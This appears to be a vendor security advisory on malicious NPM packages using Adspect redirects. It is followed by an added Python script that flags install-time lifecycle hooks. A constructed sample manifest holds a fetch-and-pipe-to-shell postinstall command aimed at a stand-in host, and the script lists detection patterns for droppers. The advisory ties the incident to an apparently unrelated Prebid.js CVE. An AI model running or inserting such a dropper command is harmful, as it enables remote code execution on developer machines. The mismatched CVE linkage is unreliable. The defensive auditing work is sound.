Executive Summary
In June 2024, security researchers uncovered a supply chain attack involving seven malicious packages on the NPM registry that abused the Adspect cloud-based service. Attackers used these packages to redirect users through Adspect, circumventing many security sandboxes and researcher analysis tools. This sophisticated evasion allowed threat actors to selectively route potential victims to malicious payloads while deflecting scrutiny from security firms. The malicious packages were rapidly removed from NPM, but not before posing a significant risk to open-source software supply chains.
This incident highlights the increasing exploitation of trusted third-party platforms and infrastructure in software supply chain attacks. With adversaries leveraging evasive redirects and advanced obfuscation tactics, organizations face a growing need for robust dependency management, automated threat detection, and enhanced monitoring of public code repositories.
Why This Matters Now
The malicious NPM package incident underscores the urgent threat of open-source supply chain attacks targeting developer ecosystems. As attackers develop stealthier techniques like redirect abuse, organizations must act swiftly to strengthen their code vetting, dependency controls, and real-time detection to prevent business-critical exposures.
Attack Path Analysis
Attackers introduced malicious npm packages into the supply chain, which were installed by unsuspecting developers or organizations (Initial Compromise). The execution of these packages granted the attacker initial code execution, potentially allowing escalation of privileges within the local or cloud environment (Privilege Escalation). Once on the host or in the environment, the attacker could move laterally to other nodes, workloads, or cloud resources (Lateral Movement). The malware communicated with attacker infrastructure via redirection services to establish command and control (Command & Control). Data or secrets could be exfiltrated from the compromised environment using covert channels or malicious script activity (Exfiltration). Finally, attackers could leverage access for further compromise, persistence, or business disruption (Impact).
Kill Chain Progression
Initial Compromise
Description
Malicious npm packages were published and installed, granting attackers initial access via the supply chain.
Related CVEs
CVE-2025-59038
CVSS 8.6. Malicious code in Prebid.js 10.9.2 attempts to redirect cryptocurrency transactions to the attacker's wallet.
Affected Products:
Prebid Prebid.js – 10.9.2
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Command and Scripting Interpreter
Phishing: Spearphishing via Service
Signed Binary Proxy Execution
Application Layer Protocol: Web Protocols
Ingress Tool Transfer
Subvert Trust Controls: Mark-of-the-Web Bypass
Deobfuscate/Decode Files or Information
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Security of Software Development Processes
Control ID: 6.3.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Third-Party Risk Management
Control ID: Art. 9(2)
CISA Zero Trust Maturity Model 2.0 – Asset Inventory and Software Bill of Materials (SBOM)
Control ID: Asset Management–Visibility and Analytics
NIS2 Directive – Security in Network and Information Systems at the Level of Supply Chain
Control ID: Art. 21(2)(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Supply chain attacks targeting npm packages directly compromise software development pipelines, requiring enhanced egress security and zero trust segmentation for development environments.
Information Technology/IT
Malicious npm packages with Adspect redirects create lateral movement risks in IT infrastructure, necessitating multicloud visibility and threat detection capabilities.
Financial Services
Supply chain compromises threaten financial applications built with infected npm packages, demanding encrypted traffic monitoring and compliance with PCI/NIST frameworks.
Health Care / Life Sciences
Healthcare software dependencies face supply chain risks requiring anomaly detection and HIPAA-compliant segmentation to protect patient data systems.
Sources
- Malicious NPM packages abuse Adspect redirects to evade security: https://www.bleepingcomputer.com/news/security/malicious-npm-packages-abuse-adspect-redirects-to-evade-security/
- CVE-2025-59038 Detail: https://nvd.nist.gov/vuln/detail/CVE-2025-59038
- Malicious NPM packages posing as utilities delete project directories: https://www.bleepingcomputer.com/news/security/malicious-npm-packages-posing-as-utilities-delete-project-directories/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Applying Zero Trust segmentation, workload isolation, egress policy enforcement, and visibility controls throughout the cloud environment would have restricted the attacker's ability to propagate, communicate externally, and exfiltrate data, limiting the attack to its initial entry point and improving detection. Strong lateral controls, inspection of egress channels, and anomaly/threat detection across workloads are critical to defend against supply chain malware and runtime threats.
Control: Cloud Firewall (ACF)
Mitigation: Blocks known malicious endpoints at initial access.
Control: Zero Trust Segmentation
Mitigation: Restricts privilege escalation paths to sensitive services.
Control: East-West Traffic Security
Mitigation: Blocks unauthorized lateral movement across the internal environment.
Control: Egress Security & Policy Enforcement
Mitigation: Detects and blocks suspicious outbound connections.
Control: Threat Detection & Anomaly Response
Mitigation: Identifies and alerts on anomalous exfiltration attempts, enabling rapid incident response and containment across cloud workloads.
Impact at a Glance
Affected Business Functions
- Web Development
- Cryptocurrency Transactions
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of sensitive user data and financial information due to malicious redirects.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust segmentation to limit direct workload communication and reduce attack propagation.
- Enforce strict egress controls with cloud firewalls and FQDN filtering to block malicious outbound connections and C2 traffic.
- Leverage real-time threat detection and anomaly response for early identification of abnormal behaviors and exfiltration attempts.
- Increase visibility across multicloud and hybrid environments with centralized policy management and observability tools.
- Regularly audit installed packages and monitor supply chain dependencies to detect and remediate malicious code introductions early.
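The last recommendation, auditing installed packages for malicious code, can be partly automated. The script below is an added example and is not part of the advisory or of any vendor product; it walks a `node_modules` tree, reads each `package.json`, and reports every `preinstall`/`install`/`postinstall` lifecycle script, adding a heuristic reason when the command looks like an install-time dropper (downloads, piping into a shell, inline JavaScript, obfuscation). The package names, manifests and patterns are constructed for the demonstration; the seven packages from the incident are not named on this page, so none are referenced here.

```python
"""Audit a node_modules tree for packages that run install-time scripts.

Added example (constructed, not from the advisory). Malicious npm packages
typically gain code execution through lifecycle hooks, so every such hook is
worth reviewing, and a few command fragments are strong dropper indicators.
"""
from __future__ import annotations

import json
import os
import pathlib
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic indicators (constructed): rare in legitimate build steps,
# common in install-time droppers.
SUSPICIOUS_PATTERNS = (
    (re.compile(r"\b(curl|wget|Invoke-WebRequest)\b"), "downloads content at install time"),
    (re.compile(r"\|\s*(sh|bash)\b"), "pipes downloaded content into a shell"),
    (re.compile(r"\bnode\s+-e\b"), "runs inline JavaScript"),
    (re.compile(r"base64|atob\(|fromCharCode"), "decodes an obfuscated payload"),
    (re.compile(r"https?://"), "references a hard-coded URL"),
)


def audit_manifest(manifest: dict) -> list[tuple[str, str]]:
    """Return (hook, reason) findings for one parsed package.json."""
    findings: list[tuple[str, str]] = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # Any lifecycle hook is reported; it runs code on `npm install`.
        findings.append((hook, "lifecycle script present"))
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(cmd):
                findings.append((hook, reason))
    return findings


def audit_node_modules(root: str) -> dict[str, list[tuple[str, str]]]:
    """Map package name -> findings for every package.json under root."""
    results: dict[str, list[tuple[str, str]]] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = pathlib.Path(dirpath) / "package.json"
        try:
            manifest = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the audit
        name = manifest.get("name") or path.parent.name
        findings = audit_manifest(manifest)
        if findings:
            results[name] = findings
    return results


def risk_level(findings: list[tuple[str, str]]) -> str:
    """'high' if any heuristic fired, otherwise 'review' (plain lifecycle hook)."""
    reasons = {reason for _hook, reason in findings}
    return "high" if reasons - {"lifecycle script present"} else "review"


# Constructed sample packages (hypothetical names, not the incident's packages).
SAMPLE_PACKAGES = {
    "tidy-strings": {"name": "tidy-strings", "version": "1.0.0"},
    "native-addon": {"name": "native-addon", "version": "2.1.0",
                     "scripts": {"install": "node-gyp rebuild"}},
    "helper-utils": {"name": "helper-utils", "version": "0.0.3",
                     "scripts": {"postinstall": "curl -s https://example.invalid/p.sh | sh"}},
}


def build_sample_tree() -> str:
    """Write the constructed packages into a temporary node_modules and return its path."""
    root = tempfile.mkdtemp(prefix="npm-audit-demo-")
    for dirname, manifest in SAMPLE_PACKAGES.items():
        pkg_dir = pathlib.Path(root, "node_modules", dirname)
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    return os.path.join(root, "node_modules")


if __name__ == "__main__":
    for name, findings in sorted(audit_node_modules(build_sample_tree()).items()):
        print(f"{name}: {risk_level(findings)}")
        for hook, reason in findings:
            print(f"  {hook}: {reason}")
```

Point `audit_node_modules` at a real project's `node_modules` to review it; packages rated `review` usually have a legitimate native build step, while `high` findings deserve inspection before the dependency is kept. Running this in CI with `--ignore-scripts` installs, so that nothing executes before the audit, is the usual way to apply it.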